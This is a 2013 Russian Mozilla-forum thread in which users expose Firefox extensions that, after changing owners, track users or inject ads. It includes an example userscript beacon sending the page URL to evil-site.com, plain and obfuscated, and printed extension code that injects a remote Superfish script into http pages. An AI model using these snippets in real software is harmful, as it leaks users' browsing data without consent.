>Форум Mozilla Россия http://forum.mozilla-russia.org/index.php >Флейм http://forum.mozilla-russia.org/viewforum.php?id=14 >Компания скупает расширения для Firefox и шпионит через них. http://forum.mozilla-russia.org/viewtopic.php?id=57735 |
geczu > 16-01-2013 16:17:14 |
http://www.xakep.ru/post/59936/ Кто что думает? И предлагаю постить названия шпионских расширений. |
KooL > 16-01-2013 16:25:59 |
Про Fasterfox давно писали, что следит. Да и расширение невнятное, очередной супер-пупер ускоритель как бы. |
geczu > 16-01-2013 18:49:22 |
Но Autocopy с виду нормальное, да и статистику ему совсем не зачем отправлять. |
oxymoron > 16-01-2013 21:45:54 |
... |
geczu > 17-01-2013 13:38:30 |
Одно дело, когда шпионит что-то вроде mail.ru - этого ждешь. А другое, когда autocopy от которого этого просто не ждешь. И может кто знает отправляет flashgot статистику анонимно или нет? Вроде есть опция feedback в about:config, но не понятно за что отвечает. |
Крошка Ру > 17-01-2013 22:04:57 |
annalemash, Вовсе не обязательно - можно портабельную (то есть не требующую установки - просто положить папочку с программой в Program Files , Мои документы или куда-то ещё - на выбор ) версию того же уже с подрезанными крыльями хранить на флешке или например в облачном хранилище |
Виталий Опекунов > 14-02-2013 03:13:40 |
Согласен.Так и происходит сейчас |
Пандёнок > 27-02-2013 22:43:38 |
geczu пишет
Отсутствие этой опции ни о чём не говорило бы. geczu пишет
Ничего себе. Это же кейлоггер почти. 27-02-2013 22:47:38 |
Пандёнок > 27-02-2013 23:19:46 |
Создал FAQ http://forum.mozilla-russia.org/viewtopic.php?id=58209 |
Zaycoff > 28-02-2013 07:59:16 |
Пандёнок пишет
Тогда уж и WOT нужно заносить в такой список или создать список «НЕ рекомендуемых для анонимности расширений», а то многие политики безопасности на английском и вообще не понятно, что они там пишут. WOT вполне себе явно создаёт в about:config идентифицирующее пользователя ключи: И записывает часовой пояс пользователя: В политике приватности явно сообщается об этих идентификаторах, но она написана на буржуйском и мало кто её читает, так же там прямо сообщают, что по запросу компетентных органов сдадут с потрохами всю инфу о посещённых пользователем сайтах. |
япогс > 28-02-2013 14:22:53 |
А может кто подскажет? Про этого автора и его продукты: https://addons.mozilla.org/ru/firefox/a … l-watcher/ , не шпионят ли ? |
voqabuhe > 28-02-2013 14:58:45 |
япогс пишет
Дык если ты пользуешься гуглопочтой, то чего тебе волноваться? Даже если и следит, подумаешь одним шпионом будет больше, одним меньше, что из того? |
япогс > 28-02-2013 17:29:46 |
voqabuhe пишет
Пользуюсь, гуглопочта такая-растакая или я такой. С |
vom > 28-02-2013 17:39:20 |
Пару лет назад искал подобные функции и хотел было использовать Autocopy (addon), но засомневался именно по этой причине, и благо набрел на кнопку уважаемого bunda1 Autocopy+3 (custom buttons), да с лучшим функционалом. |
aleks_123 > 28-02-2013 18:19:26 |
Zaycoff |
KooL > 28-02-2013 18:20:43 |
япогс пишет
Использую, ничего не тормозит и тормозить там вовсе нечему. Я гляжу тут много людей, кто свои почтовые сервера держат) |
япогс > 28-02-2013 18:35:54 |
KooL пишет
Да я вернулся к веб-интерфейсу пока что. |
Zaycoff > 28-02-2013 19:07:10 |
aleks_123 пишет
А в чём смысл этой приблуды? Ну даст она мне высокий рейтинг доверия для какого-то сайта. Ок. И чо? У сайта мегафона в WOT вполне себе «Превосходный» рейтинг, а от них уже не раз утекали личная переписка пользователей. Кому верить честным рейтингам WOTa или наглым, лживым журналистам? Для сайтов подавляющего большинства госучреждений рейтинг максимален, особенно впечатляет максимальное значение конфиденциальности, при том, что почти все эти сайты пашут без SSL/TLS и данные пользователей гуляют в открытом виде... 105% порнушных сайтов имеют рейтинги WOT хуже некуда, но там всё чисто и максимум должен стоять рейтиг «Не для детей». В общем это дополнение даёт пользователю только ложное чувство безопасности и запугивает там где не нужно, т.е. в целом бесполезно. Если уж так хочется проверять ссылки, то стоит поставить что-то из серии «Проверка ссылок антивирусом Dr.Web», оно хотя бы проверяет, а не пишет от балды, что сайт «хороший» |
vom > 28-02-2013 22:08:36 |
А подскажите по поводу userscript-ов для Greasemonkey, есть ли возможность через них отслеживать, получить доступ к кукам, истории, закладкам, как-то навредить? |
Infocatcher > 28-02-2013 22:15:34 |
vom |
vom > 28-02-2013 22:33:31 |
Infocatcher Может кто-то использует вот этот Dollchan Extension Tools? |
Infocatcher > 28-02-2013 22:51:26 |
vom пишет
Запускаться будет только на прописанных сайтах. |
vom > 28-02-2013 22:57:29 |
Infocatcher |
Infocatcher > 28-02-2013 23:00:54 |
vom пишет
7,5 тысяч строк? Сомнительно как-то, что кто-то будет все проверять. |
KooL > 28-02-2013 23:09:04 |
Пора запускать манифесты и регулировать права расширений, как на Андроиде, только там с этим всё работает через зад, но выглядеть должно так же как-то. |
vom > 28-02-2013 23:13:21 |
Infocatcher 28-02-2013 23:16:14 |
Infocatcher > 28-02-2013 23:26:09 |
vom Выделить код Код:new Image().src = "http://evil-site.com/track.php?url=" + encodeURIComponent(location.href); И совсем другое, когда там что-нибудь вроде Выделить код Код:new I\u006dage()["sr" + "c"] = "http://evil-site.com/track.php?url=" + encode\u0055RIComponent(location.href); |
KooL > 28-02-2013 23:29:17 |
vom |
vom > 28-02-2013 23:47:51 |
Infocatcher |
BAd > 01-03-2013 06:41:14 |
Вот перекупит кто нибудь адблок с носкриптом и прощай фаерфокс. Печально. |
KooL > 01-03-2013 08:30:16 |
BAd пишет
Здравствуй Lynx? |
Zaycoff > 01-03-2013 08:43:26 |
BAd пишет
Сомневаюсь, что их продадут, уж слишком популярны, наверняка неплохой донат идёт от пользователей (NoScript по умолчанию просит 15$, а Adblock Plus - 5$, они бы столько не просили, если бы народ не жертвовал). Думаю и Mozilla Foundation им маленько приплачивает. Притом эти дополнения опенсорс: NoScript - GPLv2, Adblock Plus - GPLv3, даже если их и продадут, то найдутся те, кто подхватит знамя и сделают нечто другое на их основе. KooL пишет
Лучше уж , в принципе для него есть неплохой аналог NoScript (мне он даже больше нравится, чем оригинальный NoScript), называется ScriptSafe, а вот с адблоком там похуже, то что сделали для хромого явно не дотягивает до версии под |
KooL > 01-03-2013 10:41:09 |
Там расширения не следят? |
Zaycoff > 01-03-2013 11:01:31 |
KooL пишет
Может и следят, нужно читать политики приватности... Но в любом случае Lynx - это не выход, слишком много сайтов отвалится, т.к. с поддержкой стандартов у него фигова-то... |
Zaycoff > 01-03-2013 17:25:23 |
okkamas_knife пишет
Тогда остаётся только юзать голый или с политиками запрещения по умолчанию на приём куков и запуск скриптов - у них хотя бы это можно, и разрешать их для каждого сайта индивидуально (правда весь мозг вынесет запросами на запуск каждого скрипта по отдельности) |
krigstask > 01-03-2013 18:21:38 |
Zaycoff пишет
Я знаю. |
BAd > 01-03-2013 21:53:20 |
okkamas_knife пишет
Популярность фаерфокс пострадает. KooL пишет
Здравствуй опера, опять. Zaycoff пишет
Можно у автора купить права на программу, потом сменить лицензию, закрыть исходники и всё. |
KooL > 01-03-2013 22:02:04 |
Сменить лицензию можно только для новых версий, лень смотреть как там разработки ведутся, но если есть коммиты от сторонних авторов, то нужно согласие каждого, кто хоть строчку написал и она была использована. Да и закрыть исходники тут непросто. BAd пишет
Опера не следит, ога. |
pohunohi > 01-03-2013 22:11:05 |
Zaycoff пишет
Там их вообще не проверяют. Ps. И вообще господа, не узайте хромоги, от них тупеют. |
Infocatcher > 01-03-2013 23:44:17 |
Кстати от расширениях, сменивших автора. http://www.captaincaveman.nl/news-devel … bsubid=100 Теперь часть перешла к некому (кой?) ppclick. Выделить код Код://installing first time var EUObjIEView = { SetExistingUser : function() { var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch); try{ prefManager.getBoolPref("extensions.ieview.use"); } catch(ex) { prefManager.setBoolPref("extensions.ieview.use", true); } } } setTimeout(function() { EUObjIEView.SetExistingUser() }, 2000); При этом выставляемая настройка (в данном случае extensions.ieview.use) больше нигде не используется. И это не считая создания никому не нужного глобального объекта. В общем-то ничего такого, но очень странно. |
Infocatcher > 02-03-2013 00:16:19 |
Совсем забыл про экспериментальные версии. 02-03-2013 00:23:43 |
geczu > 02-03-2013 10:02:13 |
Infocatcher |
Infocatcher > 02-03-2013 15:03:13 |
geczu 02-03-2013 15:07:39
|
KooL > 03-03-2013 00:08:26 |
А что думаете по поводу платных расширений, почему такого нет? |
Infocatcher > 03-03-2013 00:19:19 |
Кто же будет платить, когда вон там вот куча бесплатных? Видимо, выгоднее встраивать рекламу в «чужие» и бесплатные. |
KooL > 03-03-2013 00:23:11 |
По аналогии с Андроидом, есть Маркет, а есть, например, 4пда. Но платят ведь. К тому же берём в учёт страны, которые платят, то есть США, Япония, Южная Корея. |
geczu > 08-04-2013 12:31:48 |
4pda получает основной доход пиратства. Он вроде собирается свой магазин открыть, как только на него надавят он быстренько сдуется. Или, если начнёт легализоваться, то тоже прикроет пиратство. На некоторых его страницах такое уже есть, там запрещено публиковать ключи и ломанный софт. И ничто конечно же не мешает мозиле кроме репутации сделать все платным. Для большинства хватит простенького открытого кода. Обычный пользователь поленится ломать что-то. 08-04-2013 12:33:31 |
Пандёнок > 15-04-2013 15:08:39 |
Zaycoff пишет
При обыске сдадут в любом случае. А вообще я не считаю ВОТ вредным расширением. |
Zaycoff > 15-04-2013 20:51:57 |
Пандёнок пишет
А оно не вредное, оно просто сообщает в дата-центр о каждой посещённой пользователем страничке, притом сообщая его уникальный id без особой на то необходимости, т.е. фактически добавляет в функционал от , притом хромой уже частично отказался от такой практики, а в , благодаря WOT, она появилась... |
япогс > 16-04-2013 18:30:48 |
Zaycoff пишет
Но ведь и незаменимое, с таким функционалом больше нет расширений (чтоб маской плохой сайт перекрывало) или я ошибаюсь? |
Zaycoff > 16-04-2013 19:57:46 |
Канешно незаменимое. |
Zaycoff > 16-04-2013 22:23:16 |
okkamas_knife По моему личному мнению, WOT скрорее вреден, чем полезен, т.к. создаёт у пользователя ложное чувство защищённости и от реальных опасностей не защищает. При этом пользователь расслабляется и перестаёт думать головой, что в критической ситуации выходит боком. |
Пандёнок > 18-04-2013 12:13:25 |
япогс |
Zaycoff > 18-04-2013 13:05:39 |
Кстати, вместо WOT можно использовать Flagfox, оно само запрашивает рейтинги WOT (не отправляя при этом уникального id пользователя) и ещё кучи других систем, включая возможность проверки сайта и страницы при помощи McAfee SiteAdvisor, также можно добавить свои действия с сайтом (например, проверку страницы через VirusTotal) |
KooL > 18-04-2013 13:21:33 |
Оно автоматом этого не делает, нужно тыкать контекстное меню, там тыкать, потом тебя отправят на сайт грузить страничку. |
Dima R. > 03-07-2013 12:51:18 |
Какая замена существует для DoNotTrackMe: Online Privacy Protection 03-07-2013 12:57:51 |
pohunohi > 03-07-2013 13:30:00 |
Dima R. пишет
Dima R. пишет
С добрый десяток наберется. Сам предпочитаю подписки для АВР.
Разве не одно и то же? |
Dima R. > 03-07-2013 13:36:21 |
Я не спец, я нашёл FAQ http://forum.mozilla-russia.org/viewtopic.php?id=58209 Но, например, что использовать вместо DoNotTrackMe: Online Privacy Protection, то есть самая близкая по "мощности" альтернатива, там не сказано. |
pohunohi > 03-07-2013 14:43:33 |
Dima R. пишет
А почему вы не доверяете Abine, и по какой причине станете доверять кому-то другому? https://disconnect.me/ Для Adblock Plus. |
Dima R. > 03-07-2013 14:53:45 |
Abine - они собирают личную информацию пользователей, и к тому же сдадут вас, если что. |
pohunohi > 03-07-2013 15:03:39 |
Dima R. пишет
Они скорее всего все собирают. Изучайте Privacy Policy. Тогда остается единственный вариант - фильтры для Adblock Plus. |
Dima R. > 03-07-2013 15:10:45 |
Есть ещё вариант: |
Zaycoff > 03-07-2013 16:44:26 |
Dima R. пишет
А затем разрабы перекроят весь API и все эти дополнения отвалятся, а чинить их будет некому... Вам же дали дельный совет - поставить подписки адблока для приватности, а чтобы куками не палиться - поставить любое расширения для работы с пиченьками, например, Cookie Monster |
KooL > 03-07-2013 18:19:35 |
Стандартных настроек для кук хватает же или нет? |
Zaycoff > 03-07-2013 18:31:44 |
KooL пишет
К сожалению не хватает, уж больно через одно место всё сделано, в том же хромом можно отключить приём куков, но при этом на сайте, который их требует, появится уведомление в адресной строке - типа «этот сайт запрашивает установку куков», кликнув по которому их можно разрешить, а в лисе нужно лезть чёрти куда, чтобы прописать разрешение... |
Kamui > 03-07-2013 19:46:12 |
Zaycoff пишет
network.cookie.lifetimePolicy;1 |
KooL > 03-07-2013 19:59:55 |
Как-будто каждую минуту новый сайт в исключения добавляется) |
Zaycoff > 04-07-2013 05:14:12 |
Kamui пишет
Прикольно, не знал, но уж больно топорно сделано, выскакивает алерт и нужно сделать выбор, а я ещё не знаю буду я тут логиниться или нет, а при каждом переходе алерт выскакивает по новой и жутко бесит... |
trionZabilParol > 11-07-2013 11:08:42 |
Подтвердите мои опасения? Расширение BrowserProtect https://addons.mozilla.org/RU/firefox/a … erprotect/ после каждой блокировки перебрасывает в facebook, причем галочка "поделиться в facebook" не снимается (возвращается на мето сама). Или это баг? |
lilololilt > 15-08-2013 17:10:11 |
И так, встречаем еще один навязчивый сборщик статистики, при этом, что интересно, не отключаемый сбор статистики. Выделить код Код:00:00:04.460 0.681 880 260 POST 200 text/html http://www.browserprotect.org/getSeverity.php 00:00:15.256 0.689 754 249 GET 200 text/html http://www.browserprotect.org/blacklist.php?t=2&n=http://www.bing.com/search::http://www.google.com/search&o=http://www.bing.com/search&a=false 15-08-2013 17:12:52 15-08-2013 17:14:33 |
Пандёнок > 16-08-2013 12:43:46 |
Переписал тему в FAQ, обратите внимание. |
lilololilt > 23-08-2013 15:42:27 |
Пандёнок Сразу в начале статьи можно написать, что название Внимание! Шпионские дополнения и их аналоги сделано таким для привлечения внимания и по закону они не являются шпионскими. Добавить просьбу к программистам. BlockSite тоже под GNU General Public License, версия 3.0 если найдется программист, которой будет копипастить дополнения Wips.com s.r.o. и резать оттуда сбор статистики это будет прикольно. К поисковым плагинам добавить https://addons.mozilla.org/ru/firefox/a … earch-bar/ в которой можно создавать самому. В NoScript есть функция http://noscript.net/abe/ включена по умолчанию, описана в Политике приватности. Фактически с ней NoScript тоже попадает в список темы. Счётчик попаданий в AdBlock Plus. В Flagfox отправка запроса требуется не "вроде бы", а точно. Другим способом это сделать нельзя, только подключившись к базе данных и стянув оттуда информацию о IP, причём нету гарантий, что она верная (могут ошибиться, не вовремя обновить, составителей базы могут обмануть). Использование Flagfox ничем не отличается от входа на сайт типа WHOIS и вбивание адреса сайта в поле "узнать о сайте". |
Zaycoff > 23-08-2013 16:43:07 |
lilololilt пишет
Откройте это расширение любым zip архиватором - там в каталоге \ipdb есть два файлика ip4.db и ip6.db... |
Пандёнок > 24-08-2013 12:17:41 |
lilololilt пишет
Кто силён в английском и NoScript, переведите, что такое abe. Adblock Plus опасен не более, чем журнал, поскольку никуда ничего не отправляет. |
lilololilt > 27-08-2013 14:16:22 |
Идея стоящая за ABE модулем - уплотнение веб приложения ориентированное на защиту предоставляемую но скрипт фаерволоподобным компонентом запущенным в браузере. Этот "Фаервол" специализирован ограждать и защищать границы для каждого чувствительного веб приложения ценного для пользователя, следующего политике определенной пользователем (тут что-то упустил), или веб-разработчика/администратора или довернной третьей стороны. Правила ABE удобны. Но дальше я переводить не стал, потому что нашел нужный кусок в описании политики:
(Почему-то при копировании с сайта мозилы постоянно ломается форматирование) В общем суть в том, что существует некая аттака на (WAN ) IP (WAN это сети охватывающие какие-то большие территории). Эта аттака привязывает чужой DNS вместо настоящего и направлена на внешний WAN IP. Для защиты от такой аттаки необходимо знать настоящий внешний (WAN) IP и для его определение постоянно отправляются запросы на https://secure.informaction.com/ipecho То есть эта штука делает примерно то, что flagfox и подобные только не отправляет адрес посещённого сайта. Больше пока в голову ничего не приходит. Единственный реальный сценарий это правительственный эксплоит. В условиях нынешней истерии вокруг хакеров и It я бы поставил на массовый эксплоит. В самом же ABE я еще не разобрался, похоже это правила для доменов с веб приложениями. То есть там устанавливаются правила для сайтов таких приложений. А вот в Tor ABE отключен. Подозреваю потому что в Tor свой механизм фильтрации и свои правила, это чтобы они не конфликтовали. |
lilololilt > 28-08-2013 04:32:21 |
Наш следующий кандидат Copy Link Name https://addons.mozilla.org/ru/firefox/a … link-name/ |
lilololilt > 30-08-2013 14:29:17 |
Новый разработчик-шпион https://addons.mozilla.org/ru/firefox/user/ppclick/
Это не вся копипаста, там ниже написано очень много чего еще. Там есть примечание "вы можете отказаться", но не совсем ясно, как это происходит. Как я понял информация собирается то ли при входе на сайты из списка по ссылке и все дочерние сервисы, то ли происходит перенаправление время от времени. В опциях нету отключения опции сбора статистики, есть только опция "сравнить цены". Из того, что в политике написано "вы можете отказаться" делаю вывод, что опция включена по умолчанию и в настройках вряд ли это она (в настройках отключена по умолчанию, да и противоречит логике засовывать рекламу туда, где её никто не заметит). |
Пандёнок > 30-08-2013 16:22:32 |
lilololilt 30-08-2013 16:36:26 |
Zaycoff > 30-08-2013 16:56:09 |
Пандёнок пишет
|
Lain_13 > 30-08-2013 19:39:16 |
Может кому будет не лень изучить что именно они сделали? А то может вы опять панику поднимаете на ровном месте, как это было с Ghostery? Мне лезть и смотреть в то, чем я не пользуюсь, как-то лень. -_- lilololilt |
lilololilt > 30-08-2013 20:01:37 |
Lain_13 30-08-2013 20:03:47 30-08-2013 20:07:48 30-08-2013 20:19:26 |
Lain_13 > 30-08-2013 20:23:42 |
lilololilt Даже если это относится и к их расширениям (что, вроде, там указывается в заголовке), то они чётко написали, что пользователь должен самостоятельно раскрыть им свои личные данные если он хочет это сделать, а раздел об общих данных и печеньках прописан исключительно для их сайта и к «продуктам и сервисам» отношения не имеет. Вот я и предлагаю кому-нибудь из здесь присутствующих взять тот же Quick Locale Switcher и разробрать его по частям, а не языком молоть. |
lilololilt > 30-08-2013 20:43:25 |
Lain_13 Конечно будет интересно, если кто-то разберёт, что внутри. Но мне хватит и этого. |
lilololilt > 30-08-2013 21:03:48 |
скрытый текст Выделить код Код:<?xml version="1.0"?> <!DOCTYPE overlay SYSTEM "chrome://cln/locale/cln.dtd"> <overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <script type="application/x-javascript" src="chrome://cln/content/cln.js"/> <popup id="contentAreaContextMenu"> <menuitem label="&cls.context.main;" id="cls-context" insertafter="context-copylink" oncommand="CLNOverlay.CopyLinkSource(event)" onclick="CLNOverlay.CopyLinkSource(event)" statustext="&cls.description;" accesskey="C"/> </popup> <popup id="mailContext"> <menuitem label="&cls.context.main;" id="messenger-cls-context" insertafter="context-copy" onclick="CLNOverlay.CopyLinkSource(event)" statustext="&cls.description;" accesskey="C"/> </popup> </overlay> Вот посмотрел код, с виду совсем никаких дополнительных обращений (если не замаскировано), а пункт-то в настройках есть. Понял, что не пойму. скрытый текст Выделить код Код:var CLNOverlay = { Init: function() { var nsSS = Components.interfaces.nsISupportsString var oContextMenu = document.getElementById("contentAreaContextMenu"); var oCLNItem = document.getElementById("cls-context"); if (!oContextMenu) { oContextMenu = document.getElementById("mailContext"); oCLNItem = document.getElementById("messenger-cls-context"); } oContextMenu.addEventListener("popupshowing",CLNOverlay.Popup,true); var oPref = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefService).getBranch("extensions.") var ss = Components.classes[ "@mozilla.org/supports-string;1" ].createInstance(nsSS) ss.data = oCLNItem.getAttribute('statustext') oPref.setComplexValue("{103B2EA2-F063-4273-958D-6B46E5B6F98C}.description", nsSS, ss) }, Popup: function() { var oCLNItem = document.getElementById("cls-context"); if (!oCLNItem) oCLNItem = document.getElementById("messenger-cls-context"); if (oCLNItem) oCLNItem.hidden = (!gContextMenu.onLink); }, CopyLinkSource: function(oEvent) { var sText = gContextMenu.linkText(); if (oEvent.shiftKey) sText = gContextMenu.link.getAttribute("title"); Components.classes['@mozilla.org/widget/clipboardhelper;1'].getService(Components.interfaces.nsIClipboardHelper).copyString(sText); } } window.addEventListener("load",CLNOverlay.Init,true) //installing first time var EUObj = { SetExistingUser : function() { var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch); try{ prefManager.getBoolPref("extensions.cln.use"); } catch(ex) { prefManager.setBoolPref("extensions.cln.use", true); } } } setTimeout(function() { EUObj.SetExistingUser() }, 2000); |
Lain_13 > 31-08-2013 00:21:29 |
lilololilt > Вот посмотрел код, с виду совсем никаких дополнительных обращений (если не замаскировано), а пункт-то в настройках есть. Понял, что не пойму. Где ты у Copy Link Name нашёл настройки лучше расскажи. -_- okkamas_knife Все компании, которые в каком-либо виде собирают статистику, обязаны предоставлять свою политику приватности, в которой они должны чётко сообщить какие данные они собирают о пользователях, как именно и зачем. Они это и сделали. Им вовсе не обязательно для этого встраивать код в расширение. Они просто обязаны предоставить данные о том, что они собирают. |
Lain_13 > 31-08-2013 01:51:57 |
okkamas_knife Если есть варианты, то, конечно, можно выбрать, но это тема о компаниях, которые «шпионят» за своими пользователями включив специальный код в тело расширений и пока не похоже, что это именно тот случай. Даже случай с Ghostery был ближе — там-то код явно есть, хоть он и выключен по-умолчанию. Тут же — «охосспади, они следят за мной через фрейм на своих сайтах». При чём тут расширения? |
lilololilt > 31-08-2013 03:05:47 |
Lain_13
На странице дополнении кнопка Options, нажимаешь и там место для галочки и надпись "Use price comparison". Я уже писал, но повторюсь. Их "Политика приватности" уже написана и ничто не мешает при следующем обновлении поменять код полностью соответствующий ей. В политике нету строгости и описания способов сбора, да и фреймы с их сайтами, которые вроде тоже сайт и могут многое натворить. Кроме того, косвенные факты покупки и смены политики уже очень подозрительны. А странность с никому не нужной статистикой странна. Это однозначно подготовка к изменению кода. Просто, если рассуждать логически, только явная реклама превышающая возможности обычных скриптов на сайтах может заставить разработчика написать такую политику. Если даже она не появится, то в возможных планах она есть. P. S. С чего вы взяли, что я пользуюсь TorBrowser? К тому же его пользователей много, а недавно эта цифра выросла в 2 раза. И там в отличии от все заточено под скрытие, даже поставив темку с AMO я свечусь больше чем с ним. |
Lain_13 > 31-08-2013 06:24:24 |
lilololilt
Офигеть полезную опцию запилили… Что ещё более полезного можно было засунуть в расширение для копирования текста со ссылок, которое уже успешно это делает? О_о Теперь я не возражаю. Такое не стоит трогать даже трёхметровой палкой, даже если оно выключено по-умолчанию. Вот код добавляющий мусор: content.js Выделить код Код:addEventListener('DOMContentLoaded', function loadedContent(aEvent) { // on page load with(content) { if (aEvent.originalTarget.location.href != null) { if (aEvent.originalTarget.location.href == document.location.href && document.location.href != 'about:home' && (document.location.href.indexOf('https:') == -1) ) { var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch); var use = prefManager.getBoolPref("extensions.cln.useWizeShoppy"); if( use ) { var el_exist = document.getElementById('scr_xsale'); if(el_exist) { removeEventListener('DOMContentLoaded', loadedContent, false); return; } var script = document.createElement('script'); script.setAttribute('type', 'text/javascript'); script.setAttribute('charset', 'UTF-8'); script.setAttribute('id','scr_xsale'); script.src = 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=cln'; document.getElementsByTagName('head')[0].appendChild(script); removeEventListener('DOMContentLoaded', loadedContent, false); } } } removeEventListener('DOMContentLoaded', loadedContent, false); } removeEventListener('DOMContentLoaded', loadedContent, false); }, true); Ссылка на сайт указана как есть и без обфускации: Войдите или зарегистрируйтесь, чтобы увидеть скрытый текст. Код срабатывает если установлен параметр extensions.cln.useWizeShoppy. А вот из cln.js Выделить код Код:onPageLoad: function(aEvent) { var appcontent = document.getElementById("appcontent"); var doc = aEvent.originalTarget; var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch); var currentURL = doc.documentURI.toString(); if (currentURL.indexOf("https:") == -1) { var use = false; try { use = prefManager.getBoolPref("extensions.cln.useWizeShoppy"); } catch(e) { use = false; } if( use ) { window.messageManager.loadFrameScript("chrome://cln/content/content.js", false); if(appcontent) { appcontent.removeEventListener("DOMContentLoaded", headReplacer.onPageLoad, true); } }else { window.messageManager.removeDelayedFrameScript("chrome://cln/content/content.js"); } } Этот код вставляет скрипт content.js на все http веб-страницы (на https не вставляет). Обратите внимание, как они старательно проверяют везде, что extensions.cln.useWizeShoppy установлено. Да уж, с таким счастьем лучше три раза перестраховаться. А вот этот код отвечает за настройку: скрытый текст Выделить код Код:var need_usage = prefManager.getBoolPref("extensions.cln.useWizeShoppy"); $("#clnOptions_enable_inject").attr( "checked", need_usage ); var set_qlauncher_controls_state = function() { prefManager.setBoolPref("extensions.cln.useWizeShoppy", $("#clnOptions_enable_inject").attr( "checked")); }; Теоретически при первом посещении настроек need_usage установится в undefined и опция отмечена не будет, а если клацнуть на неё, то она установится в true и сохраниться. Вроде всё. Итого: Блин, таки опять закончилось тем, что скрипт разрбрал я. p.s. А про Tor Browser я и не предполагал, что ты им пользуешься. Я сказал, что если ты им не пользуешься, то говорить о приватности при посещении сайтов несколько странно. |
lilololilt > 31-08-2013 14:09:44 |
Lain_13
И это пока не отсылает, а код с отсыкой "не персональной информации может прилететь в любой момент". Так написана лицензия Mozilla Public License Version 1.1. На сколько законно будет просто скопировать расширение, удалить мусорный код и перезалить на AMO? И еще интересно, первые версии этого расширения были под той же лицензией? |
lilololilt > 31-08-2013 19:06:56 |
Замена Copy Link Name - Copy Link Text https://addons.mozilla.org/en-us/firefo … text-4750/ |
Lain_13 > 31-08-2013 21:04:21 |
okkamas_knife lilololilt |
lilololilt > 31-08-2013 21:18:50 |
Lain_13
Ну так политике соответствует то. Я про "не персональные данные", вроде операционки, IP, времени на компе и так далее. Но разные случаи я рассмотрел уже. Если бы я делал: |
Lain_13 > 01-09-2013 00:18:39 |
lilololilt Меня вот другое удивляет — я не обнаружил кода, который бы проверял наличие аналогичного фрейма от другого расширения. Интересно что будет если поставить всех их расширения сразу и включить отображение фрейма? |
lilololilt > 01-09-2013 16:53:01 |
А теоретически можно сделать такое расширение, которое проверяет код всех установленных расширений на наличие ссылок на сайты (то есть всех, ссылку в AdBlock Plus на страницу обновлений, ссылку Ghostery, ссылку Copy Link Name и так далее)? Так, чтобы выводился список всех таких ссылок, напротив них checkbox'ы и при снятии галочки ссылка заменяется на 127.0.0.1? Ну или кнопку сканирующую все файлы расширений в профиле? 01-09-2013 17:14:29 |
Пандёнок > 02-09-2013 07:48:58 |
lilololilt
Недопереведена: adblockplus.org/ru/privacy
|
amin01 > 13-09-2013 00:09:47 |
А вот, это расширение шпионит за пользователями ? https://addons.mozilla.org/ru/firefox/a … rg-addons/ |
lilololilt > 13-09-2013 00:39:49 |
amin01 |
amin01 > 13-09-2013 14:45:01 |
lilololilt пишет
А что там нетак с куками? |
lilololilt > 13-09-2013 14:47:19 |
amin01 13-09-2013 14:47:42 13-09-2013 14:51:03 |